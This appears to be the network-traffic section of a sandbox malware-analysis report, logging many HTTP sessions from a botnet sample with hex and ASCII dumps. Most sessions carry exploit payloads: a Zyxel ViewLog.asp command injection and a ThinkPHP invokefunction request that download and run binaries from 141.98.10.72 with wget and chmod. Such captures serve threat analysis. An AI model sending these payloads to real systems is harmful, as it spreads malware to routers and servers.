                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.052598953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:04.036209106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.259361029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:05.217820883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.145754031.136.102.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.406023979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.060931921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.340907097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:48.932780981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.052622080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:04.292262077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:26.307271957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.265680075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.145147694.120.22.1678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.444758892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.143719231.200.69.1168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.444879055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.145164094.121.96.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:44.445667982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.144592095.101.87.1580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:45.078192949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:45.265759945 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 35 26 23 34 36 3b 39 32 33 35 37 34 31 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cc3e1202&#46;1707899685&#46;92357415</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.145003895.101.10.12580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:45.092550993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:45.294245005 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 64 30 61 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 35 26 23 34 36 3b 32 37 65 38 39 37 34 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;7d0a655f&#46;1707899685&#46;27e89742</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.145020695.101.213.10580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:45.107575893 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:45.324721098 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 35 26 23 34 36 3b 31 37 63 35 61 34 39 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c5f2645f&#46;1707899685&#46;17c5a496</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.145795095.86.116.20180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:45.519706011 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.144538494.130.109.528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.169270992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.381387949 CET498INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:46 GMT
                                                        Server: Apache/2.4.18 (Ubuntu)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.145135094.23.86.688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.169297934 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.387440920 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:46 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 